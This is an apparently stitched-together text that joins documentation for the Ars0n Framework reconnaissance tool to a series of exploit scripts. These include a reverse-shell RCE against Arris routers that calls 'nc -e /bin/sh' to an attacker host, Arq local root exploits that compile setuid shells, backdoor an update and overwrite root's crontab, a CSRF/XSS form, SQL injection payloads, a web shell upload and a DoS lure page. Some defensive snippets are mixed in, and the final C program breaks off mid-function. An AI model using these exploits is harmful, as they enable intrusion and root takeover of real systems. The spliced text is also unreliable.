The user adds the root domains they wish to scan for hidden subdomains through the graphical user interface (GUI). Before running, the user can specify which Sub-Modules should be run based on the flags they choose. Each Wildfire scan runs against every domain the user has entered, in order of which domain has the oldest data. Most Wildfire scans take between 8 and 48 hours to complete if all Sub-Modules are being run. This variation in timing can be caused by a number of factors, including the target application and the machine running the framework.
Also, please note that most data will not show in the GUI until the scan has completed. It is best to try to run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has completed to move from reconnaissance to enumeration. Running Wildfire:
Graphical User Interface (GUI)
Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front end will use the checkboxes on the screen to determine which flags should be passed to the scanner.
Please note that running scans from the GUI still has a few bugs and edge cases that have not been sorted out. If you have any issues, you can simply run the scan from the CLI.
Command Line Interface (CLI)
All Core Modules of the Ars0n Framework are stored in the /toolkit directory. Simply navigate to the directory and run wildfire.py with the necessary flags. At least one Sub-Module flag must be provided.
python3 wildfire.py --start --cloud --scan
Slowburn
Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does this for you. By communicating with the APIs of various bug bounty hunting platforms, this script identifies all domains that allow testing on any discovered subdomain. Once the data has been populated, Slowburn randomly chooses one domain at a time to scan in the same way Wildfire does.
Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. Users may encounter bugs and edge cases. In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various APIs and stores it in a locally stored JSON file. Once the initialization step is complete, Slowburn automatically begins selecting and scanning one target at a time.
To initialize Slowburn, simply run the following command:
python3 slowburn.py --initialize
Once the data has been collected, it is up to the user whether to re-initialize the tool each time they want to run a scan.
Please remember that the scopes and targets of public bug bounty programs can change frequently. If you choose to run Slowburn without re-initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized before every run. If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:
python3 slowburn.py
Sub-Modules
The Sub-Modules of the Ars0n Framework are designed to be leveraged by the Core Modules to divide the reconnaissance and enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand the picture of the target's attack surface.
Fire-Starter
Fire-Starter is the first step in performing reconnaissance against a target domain. The goal of this script is to collect a wealth of information about the attack surface of the target. Once collected, this data is used by all other Sub-Modules to help the user identify specific URLs that are potentially vulnerable.
Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and ASNs to identify where those external entries are hosted. Currently, this process works by chaining together the following widely used open-source tools:
Amass, Sublist3r, Assetfinder, Get All URLs (GAU), Certificate Transparency Logs (CRT), Subfinder, ShuffleDNS, GoSpider, Subdomainizer. These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.
Once the scan is complete, the dashboard is updated and made available to the user. Most Sub-Modules in the Ars0n Framework require the data collected by the Fire-Starter module in order to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.
Fire-Cloud
Coming soon...
Fire-Scanner
Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform wide-band scanning against all subdomains and cloud services discovered in the previous scans.
At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.
Troubleshooting
The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.
It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools has its own way of operating and can experience unexpected behaviour if conflicts arise with any existing service/tool running on the user's system. This complexity is the reason why the Ars0n Framework should only be run on a clean installation of Kali Linux. Another very common issue users experience is that MongoDB does not successfully install and/or run on their machine. The most common manifestation of this issue is that the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine meets the necessary system requirements to run MongoDB. Unfortunately, there is currently no solution if you run into this issue.
Frequently Asked Questions
Coming soon...
<!--
# Exploit Title: Unauthenticated Stored Xss
# Date: 11/6/15
# Exploit Author: Nu11By73
# Vendor Homepage: comcast.net and arrisi.com
# Version: eMTA & DOCSIS Software Version: 10.0.59.SIP.PC20.CT
Software Image Name:TG1682_2.0s7_PRODse
Advanced Services:TG1682G
Packet Cable:2.0
# Tested on: Default Install
-->
<html>
<p>Unauth Stored CSRF/XSS - Xfinity Modem</p>
<form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php">
<input type="hidden" name="set" value="true" />
<input type="hidden" name="UMSStatus" value="Enabled" />
<input type="hidden" name="add" value="true" />
<input type="hidden" name="service" value="test><script>alert(1)</script>" />
<input type="hidden" name="protocol" value="TCP" />
<input type="hidden" name="startPort" value="1" />
<input type="hidden" name="endPort" value="2" />
<input type="hidden" name="block" value="true" />
<input type="submit" title="Enable Service" />
</form>
</html>
# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Date: 17/11/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.commscope.com/
# Version: 9.1.103
# Tested on: TG2482A, TG2492, SBG10
# CVE : CVE-2022-45701
import requests
import base64

router_host = "http://192.168.0.1"
username = "admin"
password = "password"
lhost = "192.168.0.6"
lport = 80


def main():
    print("Authorizing...")
    cookie = get_cookie(gen_header(username, password))
    if cookie == '':
        print("Failed to authorize")
        exit(-1)
    print("Generating Payload...")
    payload = gen_payload(lhost, lport)
    print("Sending Payload...")
    send_payload(payload, cookie)
    print("Done, check shell..")


def gen_header(u, p):
    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")


def no_encode_params(params):
    return "&".join("%s=%s" % (k, v) for k, v in params.items())


def get_cookie(header):
    url = router_host + "/login"
    params = no_encode_params({"arg": header, "_n": 1})
    resp = requests.get(url, params=params)
    return resp.content.decode('UTF-8')


def set_oid(oid, cookie):
    url = router_host + "/snmpSet"
    params = no_encode_params({"oid": oid, "_n": 1})
    cookies = {"credential": cookie}
    requests.get(url, params=params, cookies=cookies)


def gen_payload(h, p):
    return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"


def send_payload(payload, cookie):
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)
    set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)


if __name__ == '__main__':
    main()
=begin
As well as the other bugs affecting Arq <= 5.9.6 there is also another issue
with the suid-root restorer binaries in Arq for Mac. There are three of them
and they are used to execute restores of backed up files from the various
cloud providers.
After reversing the inter-app protocol I discovered that the path to the
restorer binary was specified as part of the data packet sent by the UI. After
receiving this, the restorer binaries then set +s and root ownership on this
path. This means we can specify an arbitrary path which will receive +s and root
ownership.
This issue is fixed in Arq 5.10.
=end
#!/usr/bin/env ruby
##################################################################
###### Arq <= 5.9.7 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
##################################################################
s = File.stat("/Applications/Arq.app/Contents/Resources/standardrestorer")
if s.mode != 0104755 or s.uid != 0
  puts "Not vulnerable - standardrestorer is not suid root."
  exit 1
end
binary_target = "/tmp/arq_597_exp"
d = "\x01\x00\x00\x00\x00\x00\x00\x00"
e = "\x00\x00\x00\x00\x03"
z = "0000"
target = sprintf("%s%s-%s-%s-%s-%s%s%s", z,z,z,z,z,z,z,z)
plist = "<plist version=\"1.0\"><dict><\/dict><\/plist>"
backup_set = "0" * 40
hmac = "0" * 40
payload = sprintf(
"%s%s%s%s\$%s%s\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" +
"\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30\x2e\x30" +
"\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s\x00\x00\x00%s" +
"\x00\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00\x00\x00%s\x00\x00" +
"\x00%s\x00\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00\x00\x00\x00\x00\x00" +
"\x14\x00%s\x00\x00\x00\x00\x03%s\x0a",
d, binary_target.length.chr, binary_target,
d, target,
d, plist.length.chr, plist,
d, backup_set,
d, d, d, hmac,
d, d, d, e * 10
)
shellcode = "#include <unistd.h>\nint main()\n{ setuid(0);setgid(0);"+
"execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{binary_target};/bin/bash\","+
"NULL);return 0; }"
IO.popen("gcc -xc -o #{binary_target} -", mode="r+") do |io|
  io.write(shellcode)
  io.close
end
IO.popen("/Applications/Arq.app/Contents/Resources/standardrestorer " +
         "2>/dev/null", mode="r+") do |io|
  io.getc && io.write(payload)
end
timeout=3
i=0
while (s = File.stat(binary_target)) && (s.mode != 0104755 or s.uid != 0)
  sleep 0.1
  i += 1
  if i >= (timeout * 10)
    break
  end
end
if s.mode == 0104755 and s.uid == 0
  system(binary_target)
  exit 0
end
puts "exploit failed"
# Arq Backup from Haystack Software is a great application for backing up macs and
# windows machines. Unfortunately versions of Arq for mac before 5.9.7 are
# vulnerable to a local root privilege escalation exploit.
# The updater binary has a "setpermissions" function which sets the suid bit and
# root ownership on itself but it suffers from a race condition that allows you to
# swap the destination for these privileges using a symlink.
# We can exploit this to get +s and root ownership on any arbitrary binary.
# Other binaries in the application also suffer from the same issue.
# This was fixed in Arq 5.9.7.
# https://m4.rkw.io/arq_5.9.6.sh.txt
# 49cc82df33a3e23245c7a1659cc74c0e554d5fdbe2547ac14e838338e823956d
# ------------------------------------------------------------------------------
#!/bin/bash
##################################################################
###### Arq <= 5.9.6 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ####
##################################################################
vuln=`ls -la /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater |grep 'rwsr-xr-x' \
|grep root`
cwd="`pwd`"
if [ "$vuln" == "" ] ; then
echo "Not vulnerable - auto-updates not enabled."
exit 1
fi
cat > arq_596_exp.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl(
"/bin/bash","bash","-c","rm -f $cwd/arq_updater;/bin/bash",
NULL
);
return 0;
}
EOF
gcc -o arq_596_exp arq_596_exp.c
rm -f arq_596_exp.c
ln -s /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater
./arq_updater setpermissions &>/dev/null&
rm -f ./arq_updater
mv arq_596_exp ./arq_updater
i=0
timeout=10
while :
do
r=`ls -la ./arq_updater |grep root`
if [ "$r" != "" ] ; then
break
fi
sleep 0.1
i=$((i+1))
if [ $i -eq $timeout ] ; then
rm -f ./arq_updater
echo "Not vulnerable"
exit 1
fi
done
./arq_updater
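A defender-side counterpart to the two Arq issues above (the client-supplied restorer path that receives +s, and the symlink race in setpermissions), added here and not taken from the exploits or from Haystack's code: the privileged chown/chmod is applied to a descriptor that has already been checked to be a regular file, opened without following a final symlink, and resolved to a location inside the application's Resources directory. The directory layout it checks is constructed in a temp dir, the grant_setuid_root step needs root and is not exercised by the demo, and the allowed directory and file names are assumptions.

```python
import os
import stat
import tempfile


def open_validated_restorer(path, allowed_dir):
    """Open `path` for a later fchown/fchmod, refusing anything that is not a regular
    file located (after symlink resolution) inside `allowed_dir`. Returns an open fd;
    the caller must close it."""
    root = os.path.realpath(allowed_dir)
    # O_NOFOLLOW: a symlink as the final path component fails instead of being followed,
    # which is the swap the setpermissions race relies on.
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise ValueError("not a regular file")
        real = os.path.realpath(path)          # resolves symlinks in directory components too
        if os.path.commonpath([real, root]) != root:
            raise ValueError(f"{real} is outside {root}")
        # Bind the containment check to the object actually opened, so a path swapped
        # between realpath() and the later fchmod() cannot redirect the privilege grant.
        rst = os.stat(real)
        if (rst.st_dev, rst.st_ino) != (st.st_dev, st.st_ino):
            raise ValueError("path changed during validation")
    except BaseException:
        os.close(fd)
        raise
    return fd


def grant_setuid_root(fd):
    """The privileged step, applied to the descriptor rather than to a path. Requires root."""
    os.fchown(fd, 0, 0)
    os.fchmod(fd, 0o4755)


def is_acceptable(path, allowed_dir):
    """True only if open_validated_restorer would hand back a descriptor for `path`."""
    try:
        fd = open_validated_restorer(path, allowed_dir)
    except (OSError, ValueError):
        return False
    os.close(fd)
    return True


def demo():
    """Constructed layout in a temp dir: a legitimate restorer inside Resources, a
    binary outside it (named after the exploit's /tmp target), a symlink inside
    Resources pointing at that binary, and a ../ traversal reaching it."""
    with tempfile.TemporaryDirectory() as tmp:
        res = os.path.join(tmp, "Arq.app", "Contents", "Resources")
        os.makedirs(res)
        inside = os.path.join(res, "standardrestorer")
        outside = os.path.join(tmp, "arq_597_exp")
        link = os.path.join(res, "arq_updater")
        for p in (inside, outside):
            with open(p, "wb") as f:
                f.write(b"\x00")
        os.symlink(outside, link)
        traversal = os.path.join(res, "..", "..", "..", "arq_597_exp")
        return {
            "inside": is_acceptable(inside, res),
            "outside": is_acceptable(outside, res),
            "symlink": is_acceptable(link, res),
            "traversal": is_acceptable(traversal, res),
        }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case:10} -> {'accepted' if ok else 'rejected'}")
```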
#!/bin/bash
#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html              ######
#################################################################

app="/Applications/Arq.app"
res="$app/Contents/Resources"
lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources"

vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root`

if [ "$vuln" == "" ] ; then
  echo "Not vulnerable - auto-updates not enabled."
  exit 1
fi

if [ "$1" != "-f" ] ; then
  latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`"
  status_line="`egrep -i 'backup session.*?(ended|started)' \
\"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`"

  if [ "$status_line" != "" ] ; then
    echo -n "WARNING: backup in progress, the user will very "
    echo "likely notice if we exploit now!"
    echo "use -f to override."
    exit 1
  fi
fi

owd="`pwd`"

if [ -e ~/.arq_510_privesc_exp ] ; then
  rm -rf ~/.arq_510_privesc_exp
fi

mkdir ~/.arq_510_privesc_exp
cd ~/.arq_510_privesc_exp

echo "copying application..."
cp -R /Applications/Arq.app .

echo "compiling payloads..."

cat > payload.sh <<EOF
#!/bin/bash

rm -rf $HOME/.arq_510_privesc_exp

while :
do
  pid=\`ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \
|cut -d ' ' -f2\`
  if [ "\$pid" != "" ] ; then
    kill -9 \$pid
    open $app/Contents/Library/LoginItems/Arq\ Agent.app
    exit 0
  fi
done
EOF

chmod 755 payload.sh

au_relative=`echo "$lires/standardrestorer" |sed 's/^\/Applications\///'`

cat > shell.c <<EOF
#include <unistd.h>
#include <string.h>

int main(int ac, char *av[])
{
  if (ac > 1 && strcmp(av[1], "boom") == 0) {
    setuid(0);
    setgid(0);
    execl(
      "/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr"
      "estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay"
      "load.sh;/bin/bash", NULL
    );
  }
  return 0;
}
EOF

mv Arq.app/Contents/Resources/standardrestorer \
Arq.app/Contents/Resources/standardrestorer.orig
gcc -o Arq.app/Contents/Resources/standardrestorer shell.c
rm -f shell.c

payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8`

GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1`
cwd=`pwd`

echo "creating backdoored Arq.zip..."
zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null
rm -rf Arq.app/

echo "executing upgrade..."
"$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \
1>/dev/null 2>/dev/null

echo "waiting..."

while :
do
  ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8`
  x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root`
  if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then
    cd "$owd"
    $res/standardrestorer boom
    exit 0
  fi
  sleep 0.2
done
#!/usr/bin/env ruby
#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html              ######
#################################################################
######                                                     ######
###### Usage:                                              ######
######                                                     ######
###### ./arq_5.10.rb              # stage 1                ######
######                                                     ######
###### (wait for next Arq backup run)                      ######
######                                                     ######
###### ./arq_5.10.rb              # stage 2                ######
######                                                     ######
###### if you know the HMAC from a previous run:           ######
######                                                     ######
###### ./arq_5.10.rb stage2 <hmac>                         ######
######                                                     ######
#################################################################
###### USE AT YOUR OWN RISK - THIS WILL OVERWRITE THE ROOT ######
###### USER'S CRONTAB!                                     ######
#################################################################

$binary_target = "/tmp/arq_510_exp"

class Arq510PrivEsc
  def initialize(args)
    @payload_file = ".arq_510_exp_payload"
    @hmac_file = ENV["HOME"] + "/.arq_510_exp_hmac"
    @backup_file = ENV["HOME"] + "/" + @payload_file

    @target = shell("ls -1t ~/Library/Arq/Cache.noindex/ |head -n1")
    @bucket_uuid = shell("grep 'writing head blob key' " +
      "~/Library/Logs/arqcommitter/* |tail -n1 |sed 's/^.*key //' |cut -d " +
      "' ' -f4")
    @computer_uuid = shell("cat ~/Library/Arq/config/app_config.plist |grep " +
      "-A1 #{@target} |tail -n1 |xargs |cut -d '>' -f2 |cut -d '<' -f1")
    @backup_endpoint = shell("cat ~/Library/Arq/config/targets/#{@target}.target " +
      "|grep -A1 '>endpointDescription<' |tail -n1 |xargs |cut -d '>' -f2 " +
      "| cut -d '<' -f1")
    @latest_backup_set = latest_backup_set

    puts "         target: #{@target}"
    puts "    bucket uuid: #{@bucket_uuid}"
    puts "  computer uuid: #{@computer_uuid}"
    puts "backup endpoint: #{@backup_endpoint}"
    puts "  latest backup: #{@latest_backup_set}\n\n"

    if args.length > 0
      method = args.shift
      if respond_to? method
        send method, *args
      end
    else
      if File.exist? @hmac_file
        method = :stage2
      else
        method = :stage1
      end
      send method
    end
  end

  def shell(command)
    `#{command}`.chomp
  end

  def latest_backup_set
    shell("grep 'writing head blob' ~/Library/Logs/arqcommitter/* |tail -n1 " +
      "|sed 's/.*key //' |cut -d ' ' -f1")
  end

  def scan_hmac_list
    packsets_path = shell("find ~/Library/Arq/ -type d -name packsets")
    hmac = {}
    shell("strings #{packsets_path}/*-trees.db").split("\n").each do |line|
      if (m = line.match(/[0-9a-fA-F]+/)) and m[0].length == 40
        if !hmac.include? m[0]
          hmac[m[0]] = 1
        end
      end
    end
    hmac
  end

  def stage1
    print "building HMAC cache... "
    hmac = scan_hmac_list
    File.open(@hmac_file, "w") do |f|
      f.write(@latest_backup_set + "\n" + hmac.keys.join("\n"))
    end
    puts "done - stored at #{@hmac_file}"

    print "dropping backup file... "
    File.open(@backup_file, "w") do |f|
      f.write("* * * * * /usr/sbin/chown root:wheel #{$binary_target} &&" +
        "/bin/chmod 4755 #{$binary_target}\n")
    end
    puts "done"
    puts "wait for the next backup run to complete and then run again"
  end

  def stage2(target_hmac=nil)
    if !target_hmac
      if !File.exist? @hmac_file
        raise "hmac list not found."
      end

      print "loading HMAC cache... "
      data = File.read(@hmac_file).split("\n")
      puts "done"

      initial_backup_set = data.shift
      if initial_backup_set == @latest_backup_set
        puts "no new backup created yet"
        exit 1
      end

      hmac = {}
      data.each do |h|
        hmac[h] = 1
      end

      hmac_targets = []
      print "scanning for HMAC targets... "
      scan_hmac_list.keys.each do |h|
        if !hmac[h]
          hmac_targets.push h
        end
      end
      puts "done"

      if hmac_targets.length == 0
        puts "no HMAC targets, unable to continue."
        exit 0
      end

      puts "found #{hmac_targets.length} HMAC targets"
      hmac_targets.each do |hmac|
        attempt_exploit(hmac)
      end
    else
      attempt_exploit(target_hmac)
    end
  end

  def build_payload(hmac)
    d = "\x01\x00\x00\x00\x00\x00\x00\x00"
    e = "\x00\x00\x00\x00\x03"
    @overwrite_path = '/var/at/tabs/root'

    # the plist text is embedded verbatim: its length is encoded into the payload
    plist = "
<plist version=\"1.0\">
<dict>
<key>Endpoint</key>
<string>#{@backup_endpoint}</string>
<key>BucketUUID</key>
<string>#{@bucket_uuid}</string>
<key>BucketName</key>
<string>/</string>
<key>ComputerUUID</key>
<string>#{@computer_uuid}</string>
<key>LocalPath</key>
<string>/</string>
<key>LocalMountPoint</key>
<string>/</string>
<key>StorageType</key>
<integer>1</integer>
<key>SkipDuringBackup</key>
<false></false>
<key>ExcludeItemsWithTimeMachineExcludeMetadataFlag</key>
<false></false>
</dict>
</plist>"

    hex = plist.length.to_s(16).rjust(4,'0')
    plist_size = (hex[0,2].to_i(16).chr + hex[2,2].to_i(16).chr)
    pfl = @payload_file.length.chr
    opl = @overwrite_path.length.chr
    bel = @backup_endpoint.length.chr

    payload = sprintf(
      (
        "%s\$%s%s%s%s\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" +
        "\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00" +
        "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30" +
        "\x2e\x30\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s" +
        "\x00\x00\x00%s%s%s\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00" +
        "\x00\x00%s\x00\x00\x00%s%s%s\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00" +
        "\x00\x00\x00\x00\x00\x14\x00%s%s%s\x00\x00\x00\x03%s\x0a"
      ).force_encoding('ASCII-8BIT'),
      d, @target,
      d, bel, @backup_endpoint,
      plist_size, plist,
      d, @latest_backup_set,
      d, d, pfl, @payload_file,
      d, hmac,
      d, d, pfl, @payload_file,
      d, opl, @overwrite_path,
      e * 10
    )

    return payload
  end

  def attempt_exploit(hmac)
    print "trying HMAC: #{hmac} ... "

    File.open("/tmp/.arq_exp_510_payload","w") do |f|
      f.write(build_payload(hmac))
    end

    output = shell("cat /tmp/.arq_exp_510_payload | " +
      "/Applications/Arq.app/Contents/Resources/standardrestorer 2>/dev/null")
    File.delete("/tmp/.arq_exp_510_payload")

    if output.include?("Creating directory structure") and !output.include?("failed")
      puts "SUCCESS"

      print "compiling shell invoker... "
      shellcode = "#include <unistd.h>\nint main()\n{ setuid(0);setgid(0);" +
        "execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{$binary_target};rm -f " +
        "/var/at/tabs/root;/bin/bash\","+ "NULL);return 0; }"
      IO.popen("gcc -xc -o #{$binary_target} -", mode="r+") do |io|
        io.write(shellcode)
        io.close
      end
      puts "done"

      print "waiting for root+s... "
      timeout = 61
      i = 0
      stop = false

      while i < timeout
        s = File.stat($binary_target)
        if s.mode == 0104755 and s.uid == 0
          puts "\n"
          exec($binary_target)
        end
        sleep 1
        i += 1
        if !stop
          left = 60 - Time.now.strftime("%S").to_i
          left == 1 && stop = true
          print "#{left} "
        end
      end

      puts "exploit failed"
      exit 0
    else
      puts "FAIL"
    end
  end
end

Arq510PrivEsc.new(ARGV)
# # # # #
# Exploit Title: AROX School ERP PHP Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://arox.in/
# Software Link: https://www.codester.com/items/4908/arox-school-erp-php-script
# Demo: http://erp1.arox.in/
# Version: CVE-2017-15978
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/office_admin/?pid=95&action=print_charactercertificate&id=[SQL]
# http://localhost/[PATH]/office_admin/?pid=95&action=edit&id=3[SQL]
#
# Parameter: id (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: pid=95&action=print_charactercertificate&id=3 AND SLEEP(5)
#
# Parameter: id (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: pid=95&action=edit&id=3 AND SLEEP(5)
#
# Etc..
# # # # #
source: https://www.securityfocus.com/bid/54599/info
Arora Browser is prone to a remote denial-of-service vulnerability.
Attackers can exploit these issues to crash an application, which causes a denial-of-service condition.
<html>
<head>
<title>Arora Browser Remote Denial of Service </title>
<script type="text/javascript">
function loxians() {
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body bgcolor="Grey">
<center>
<br><h2><a href="javascript:loxians();">YOU HAVE WON 100,000$ ! CLICK HERE!!</a></h2>
</center>
</body>
</html>
import requests

URL = "http://127.0.0.1/ARMBot/upload.php"

r = requests.post(URL,
    data = {
        "file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;)
        "data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?>
        "message":"Bobr Dobr"
    }, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"})

print(r.status_code)
print("shell should be at http://{}/.s.phtml".format(URL))
/*
Title: Armadito Antivirus - Malware Detection Bypass
Date: 21/02/2018
Author: Souhail Hammou
Author's website: http://rce4fun.blogspot.com
Vendor Homepage: http://www.teclib-edition.com/en/
Version: 0.12.7.2
CVE: CVE-2018-7289
Details:
--------
An issue was discovered in armadito-windows-driver/src/communication.c affecting Armadito 0.12.7.2 and previous versions.
Malware with filenames containing pure UTF-16 characters can bypass detection.
The user-mode service fails to open the file for scanning once the path has been converted from Unicode to ANSI: characters that cannot be converted are replaced with the '?' character, so the converted path no longer names the file on disk.
The code responsible for this issue is located in armadito-windows-driver/src/communication.c:
========================================================================================================
// Convert unicode string to ansi string for ring 3 process.
ntStatus = RtlUnicodeStringToAnsiString(&AnsiString, (PCUNICODE_STRING)FilePath, TRUE);
if(!NT_SUCCESS(ntStatus)){
    DbgPrint("[-] Error :: ArmaditoGuard!SendScanOrder :: RtlUnicodeStringToAnsiString() routine failed !! \n");
    __leave;
}
========================================================================================================
The two examples below demonstrate the bug.
In the first case the filename is Arabic; in the second, the filename's first letter is the Greek capital letter mu (U+039C), which looks like a Latin M but has no ANSI equivalent.
Original filename:
مرحبا.exe : 0645 0631 062d 0628 0627 002e 0065 0078 0065
Converted to ANSI by Armadito:
?????.exe : 3f 3f 3f 3f 3f 2e 65 78 65
=============================
Original filename:
Μalware.exe : 039c 0061 006c 0077 0061 0072 0065 002e 0065 0078 0065
Converted to ANSI by Armadito:
?alware.exe : 3f 61 6c 77 61 72 65 2e 65 78 65
See: https://github.com/armadito/armadito-windows-driver/issues/5
*/
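The lossy conversion described above, reduced to a small portable C example added here (not Armadito's code): anything outside 7-bit ASCII becomes '?', and a defensive wrapper refuses the narrow name whenever that happened, so a scanner keeps the original UTF-16 path instead of skipping the file. The two filenames are the ones quoted in the advisory, embedded as constructed UTF-16 code-unit arrays; the function names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Lossy narrow conversion, modelled on what the advisory describes:
 * every UTF-16 code unit outside 7-bit ASCII is replaced by '?'.
 * Returns the number of replacements so the caller can tell whether
 * the narrow name still identifies the file. */
size_t narrow_lossy(const uint16_t *wide, size_t n, char *out, size_t cap)
{
    size_t i, replaced = 0;
    if (cap == 0)
        return 0;
    for (i = 0; i < n && i + 1 < cap; i++) {
        if (wide[i] < 0x80) {
            out[i] = (char)wide[i];
        } else {
            out[i] = '?';
            replaced++;
        }
    }
    out[i] = '\0';
    return replaced;
}

/* Defensive wrapper: only hand a narrow name to the scanner when the
 * conversion was exact.  Returns 1 on success; 0 means the service must
 * open the file by its original UTF-16 path instead of skipping it. */
int narrow_exact(const uint16_t *wide, size_t n, char *out, size_t cap)
{
    if (narrow_lossy(wide, n, out, cap) != 0) {
        if (cap)
            out[0] = '\0';
        return 0;
    }
    return 1;
}

/* Constructed inputs: the two filenames quoted in the advisory, plus an ASCII one. */
static const uint16_t NAME_ARABIC[] = {
    0x0645, 0x0631, 0x062d, 0x0628, 0x0627, 0x002e, 0x0065, 0x0078, 0x0065 };
static const uint16_t NAME_GREEK_M[] = {
    0x039c, 0x0061, 0x006c, 0x0077, 0x0061, 0x0072, 0x0065,
    0x002e, 0x0065, 0x0078, 0x0065 };
static const uint16_t NAME_ASCII[] = {
    0x006d, 0x0061, 0x006c, 0x0077, 0x0061, 0x0072, 0x0065,
    0x002e, 0x0065, 0x0078, 0x0065 };

#define COUNT(a) (sizeof(a) / sizeof((a)[0]))
static char scratch[64];

int main(void)
{
    size_t r = narrow_lossy(NAME_ARABIC, COUNT(NAME_ARABIC), scratch, sizeof scratch);
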